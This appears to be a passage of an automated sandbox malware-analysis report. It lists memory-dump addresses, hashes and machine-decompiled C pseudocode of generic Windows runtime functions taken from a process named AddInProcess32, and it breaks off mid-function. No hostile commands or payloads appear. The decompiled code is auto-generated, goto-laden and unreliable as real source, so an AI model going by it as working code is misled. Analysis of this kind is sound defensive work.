0x0192756a
0x0192756c
0x0192756d
0x0192756d
0x0192756f
0x01927572
0x01927574
0x01927577
0x0192757c
0x0192757f
0x00000000
0x01927551
0x01927551
0x01927551
0x01927553
0x01927553
0x01927449
0x01927449
0x0192744c
0x0192744c
0x00000000
0x0192744c
0x01927443
0x0192750e
0x01927514
0x01927514
0x01927455
0x01927469
0x0192746d
0x00000000
0x01927473
0x01927473
0x01927476
0x01927480
0x01927484
0x0192748e
0x01927493
0x01927493
0x01927496
0x01927499
0x019274a1
0x019274b1
0x019274b5
0x00000000
0x019274bb
0x019274c1
0x019274c1
0x019274c4
0x019274c5
0x019274c6
0x019274c7
0x019274c8
0x019274cd
0x00000000
0x019274d3
0x019274d3
0x019274d6
0x019274d8
0x019274db
0x019274dd
0x019274e0
0x019274e7
0x019274ee
0x019274ee
0x019274f4
0x019274f9
0x00000000
0x019274fb
0x019274fb
0x019274fd
0x01927500
0x01927503
0x01927505
0x01927505
0x019274f9
0x00000000
0x019274cd
0x019274b5
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 926098a57fa0ddbe6571b2e1afd6afe85192e4a15abf52e6bb9f59223e5bf1a6
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: BF517D71600646EFDB1ACF58C480E56FBB9FF55305F1481AAE908EF216E371EA85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01882990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E01882990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x192ff00);
				E018AD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1831664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0189E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1831668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E018D51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x183166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01882AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E01866600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01882C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0186EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01882AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01882C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01882ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E018AD0D1(_t62);
				goto L28;
			}

0x01882990
0x01882992
0x01882997
0x018829a3
0x018829a6
0x018829ab
0x018829ad
0x018829b2
0x018c5c80
0x018829b8
0x018829b8
0x018829bb
0x018829c0
0x018829c5
0x018829c6
0x018829c6
0x018829cb
0x00000000
0x00000000
0x018829cd
0x018829d0
0x018829d9
0x018829db
0x018829dd
0x01882a7f
0x01882a84
0x01882a87
0x01882a89
0x018c5ca1
0x018c5ca3
0x00000000
0x01882a8f
0x01882a8f
0x00000000
0x01882a8f
0x00000000
0x018829e3
0x018829e3
0x018829e3
0x00000000
0x018829e3
0x018829dd
0x00000000
0x018829db
0x018829e6
0x018829e9
0x018829eb
0x018829ed
0x018829f3
0x018829f5
0x018829f8
0x018829fa
0x01882a97
0x01882a9a
0x01882a9d
0x01882add
0x00000000
0x01882a9f
0x01882aa2
0x01882aa5
0x01882aa8
0x01882aab
0x018c5cab
0x018c5caf
0x018c5cc5
0x018c5cda
0x018c5cdc
0x018c5cdf
0x018c5ce5
0x00000000
0x018c5ceb
0x018c5ced
0x018c5cee
0x00000000
0x018c5cee
0x018c5cb1
0x018c5cb4
0x018c5cb9
0x018c5cbb
0x00000000
0x018c5cbd
0x018c5cbd
0x00000000
0x018c5cbd
0x018c5cbb
0x01882ab1
0x01882ab1
0x01882ac4
0x01882ac6
0x01882ac6
0x00000000
0x01882ac6
0x01882aab
0x00000000
0x01882a00
0x01882a09
0x01882a0e
0x01882a21
0x01882a24
0x01882a35
0x01882a3a
0x01882a3d
0x01882a42
0x01882a59
0x01882a59
0x01882a5c
0x01882a5f
0x01882a5f
0x018829fa
0x018829f3
0x01882a64
0x01882a64
0x01882a6b
0x01882a6b
0x01882a6d
0x01882a72
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3e07334674dbcac41cd3989b45a7e1a4834a798c89549088a6c7fc853351ed7
Instruction ID: 90934820ffe028aca41114c25bc58ee0488c0487e1d2178084adade37c6d02f6
Opcode Fuzzy Hash: e3e07334674dbcac41cd3989b45a7e1a4834a798c89549088a6c7fc853351ed7
Instruction Fuzzy Hash: CD516A71A0020ADFDF25EF99C880ADEBBB6BF58714F048119E915EB210D335DA52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01884BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01884BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x194d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0185CC50(_t86);
					L11:
					return E0189B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1948504
				E01872280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0189FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0189B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01874620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0185CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1948504
								E0186FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01884F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x01884bad
0x01884bbf
0x01884bc2
0x01884bc6
0x01884bcd
0x01884bd9
0x018c67fe
0x018c6800
0x01884ccc
0x01884ccd
0x01884cb7
0x01884cc9
0x01884cc9
0x01884bdf
0x01884be5
0x00000000
0x00000000
0x01884beb
0x01884bef
0x00000000
0x00000000
0x01884bf5
0x01884bf9
0x01884c06
0x01884c0b
0x01884c17
0x01884c1c
0x01884c1f
0x01884c25
0x01884c33
0x01884c3d
0x01884c40
0x01884c43
0x01884c47
0x01884c4d
0x01884c53
0x01884c54
0x01884c55
0x01884c56
0x01884c5b
0x01884c5c
0x01884c63
0x01884c6b
0x00000000
0x00000000
0x018c6776
0x018c6784
0x018c6784
0x018c679f
0x018c67a7
0x018c67af
0x018c67ce
0x00000000
0x018c67b1
0x018c67b7
0x018c67b8
0x018c67c1
0x018c67d3
0x018c67d9
0x018c67dd
0x01884c94
0x01884c94
0x01884c98
0x01884c9c
0x01884ca3
0x018c67f4
0x018c67f4
0x01884cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x01884cb5
0x01884c79
0x01884c7e
0x01884c89
0x01884c8b
0x01884c8f
0x01884c8f
0x00000000
0x01884c89
0x018c67c3
0x00000000
0x018c67c3
0x018c67af
0x01884c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4088141dca32b6a7231275e7f0585e4e6870f0cd6a9eea68ab87c16f4c1a3dc
Instruction ID: 1f108626a4c7a5e0d71082bfc5e9de8f9530c01ae0ee79a9cf1a24d0eebf8693
Opcode Fuzzy Hash: a4088141dca32b6a7231275e7f0585e4e6870f0cd6a9eea68ab87c16f4c1a3dc
Instruction Fuzzy Hash: 5F419736A002199BDB21EF68C940BE977B9EF45710F1105A9E908EB341E774DF45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01884D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01884D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x194d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0189FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1947bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0189B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01874620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0185CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0189B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0189F380(_t67 + 0xc, 0x1835138, 0x10) == 0) {
								 *0x19460d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01884F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01884E70(0x19486b0, 0x1885690, 0, 0) != 0) {
					_t46 = E0185CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x01884d3b
0x01884d4d
0x01884d53
0x01884d58
0x01884d65
0x01884d6c
0x01884d71
0x01884d77
0x01884d7f
0x01884d8c
0x01884d8e
0x01884dad
0x01884db0
0x01884db7
0x01884db8
0x01884db9
0x01884dba
0x01884dbb
0x01884dc1
0x01884dc8
0x01884dcc
0x01884dd5
0x01884dde
0x01884ddf
0x01884de0
0x01884de1
0x01884de6
0x01884de7
0x01884de9
0x01884df3
0x00000000
0x00000000
0x018c6c7c
0x018c6c8a
0x018c6c8a
0x018c6c9d
0x018c6ca7
0x018c6cac
0x018c6cb2
0x018c6cb9
0x00000000
0x018c6cbf
0x018c6cbf
0x00000000
0x018c6cbf
0x018c6cb9
0x01884dfb
0x018c6ccf
0x018c6cd3
0x01884e32
0x01884e39
0x018c6ce0
0x018c6cf2
0x018c6cf2
0x018c6ce0
0x01884e3f
0x01884e41
0x01884e51
0x01884e51
0x01884e03
0x01884e03
0x01884e09
0x01884e0f
0x01884e57
0x00000000
0x00000000
0x01884e1b
0x01884e30
0x01884e5b
0x01884e5b
0x00000000
0x01884e30
0x01884e11
0x01884e11
0x01884e16
0x00000000
0x01884e16
0x01884e01
0x00000000
0x01884e01
0x01884da5
0x018c6c6b
0x00000000
0x01884dab
0x01884dab
0x00000000
0x01884dab

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab13001617830b8b1259fca0c807016f3bb382206bf3e9a2d0215a7f1440b9a9
Instruction ID: 80063e7371fd65d9296ef9728f5b9e49a9af82f221ad9968d0b6b46f602327c1
Opcode Fuzzy Hash: ab13001617830b8b1259fca0c807016f3bb382206bf3e9a2d0215a7f1440b9a9
Instruction Fuzzy Hash: 4E41D572A44319AFEB32EF18CC80F6AB7A9EB54724F0400A9E945D7281D774DF44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0191AA16 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0191AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0191ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0191AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0191AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E018FCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L018777F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E01877D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0191131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E018FCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0191aa1f
0x0191aa21
0x0191aa23
0x0191aa2b
0x0191aa30
0x0191aa36
0x0191aa39
0x0191aa42
0x0191aa75
0x0191aa7a
0x0191aa7c
0x0191aa7c
0x0191aa88
0x0191aa8a
0x0191aa8f
0x0191ab02
0x0191ab04
0x0191aa99
0x0191aaa8
0x0191aaaf
0x0191aab3
0x0191aacc
0x0191aad1
0x0191aad6
0x0191aae0
0x0191aaf3
0x0191aaf9
0x0191aafe
0x0191aafe
0x0191aaf3
0x0191aad6
0x0191aab3
0x0191ab07
0x0191ab0a
0x0191ab11
0x0191ab23
0x0191ab13
0x0191ab1c
0x0191ab1c
0x0191ab2b
0x0191ab44
0x0191ab44
0x0191ab51
0x0191ab51
0x0191aa44
0x0191aa47
0x0191aa4c
0x00000000
0x00000000
0x0191aa5a
0x0191aa64
0x0191aa72
0x00000000
0x0191aa66
0x0191aa66
0x0191aa68
0x0191aa6a
0x00000000
0x0191aa6a

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: eb2af7908497f7b283ffeef41fe49dce4484fde6b124df41040c551126a31e8b
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: C8313632F021CD6BEB158B69CC44BAFFBBBEF80211F054469E909E7255DA34CE80C650

Uniqueness

Uniqueness Score: -1.00%

Function 01868A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01868A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x194d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0189B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0186E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1831180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01881DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01893C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01868999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x01868a0a
0x01868a1c
0x01868a23
0x01868a2e
0x01868a30
0x01868a36
0x01868a3c
0x01868a3e
0x01868a4a
0x01868a52
0x01868a9c
0x01868aae
0x01868a58
0x01868a5e
0x01868a6a
0x01868a6f
0x01868a75
0x01868a7d
0x01868a85
0x01868a86
0x01868a89
0x01868a93
0x01868a99
0x01868a9b
0x00000000
0x01868aaf
0x01868abe
0x01868ac3
0x01868acb
0x01868ad7
0x01868ae0
0x01868af1
0x00000000
0x01868af1
0x01868acd
0x01868ad5
0x01868afb
0x01868afd
0x01868aff
0x01868b07
0x01868b22
0x01868b24
0x01868b2a
0x01868b2e
0x01868b3f
0x01868b78
0x01868b41
0x01868b52
0x01868b54
0x01868b5c
0x01868b74
0x01868b74
0x01868b5c
0x01868b3f
0x01868b5e
0x01868b61
0x01868b64
0x01868b64
0x01868b6c
0x01868b6c
0x01868b11
0x018b9cd5
0x018b9cd5
0x01868b17
0x01868b1a
0x01868b1a
0x00000000
0x01868ad5
0x01868a89

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6fdd5a4f99520bb3ef85455ecb0584e6e12fada1e0a6d03e9a52454bbd2c55a
Instruction ID: 5ae1cc4709ab34fb393d3c9405a9439d331eed5ac6c6fbac08869d5ea7172ec4
Opcode Fuzzy Hash: b6fdd5a4f99520bb3ef85455ecb0584e6e12fada1e0a6d03e9a52454bbd2c55a
Instruction Fuzzy Hash: B4417EB4A0032D9BDB24DF19C888AA9B7F8EB55304F1041EAD91DD7242EB709F80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0191FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0191FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0191FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01920A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01877D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
